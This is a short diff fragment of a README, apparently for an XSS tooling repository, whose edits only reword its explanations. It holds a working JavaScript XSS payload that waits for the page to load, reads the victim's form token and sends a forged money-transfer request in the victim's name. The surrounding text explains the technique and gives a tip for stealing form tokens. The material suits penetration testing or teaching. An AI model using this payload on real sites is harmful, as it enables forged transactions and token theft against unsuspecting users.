ivan-sincek/xss-catcher/README.md

 <script>window.onload = function() { var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://target.com/transfer.php?recipient=eve&amount=9000&token=' + encodeURIComponent(document.getElementsByName('token')[0].value), true); xhr.send(); }</script>
 ```

-First example above will send an HTTP POST request to a target server in the victim's name with user-defined parameters as a form-data.
+First payload above will send an HTTP POST request to a target server in the victim's name with user-defined parameters as a form-data.

-Second example above will send an HTTP GET request to a target server in the victim's name with user-defined parameters in a query string (i.e. in a URL).
+Second payload above will send an HTTP GET request to a target server in the victim's name with user-defined parameters in a query string (i.e., in a URL).

 **To steal a web form token or any other web form data, you must wait for the web form to fully render/load.
 You can do that by calling the `window.onload` event.**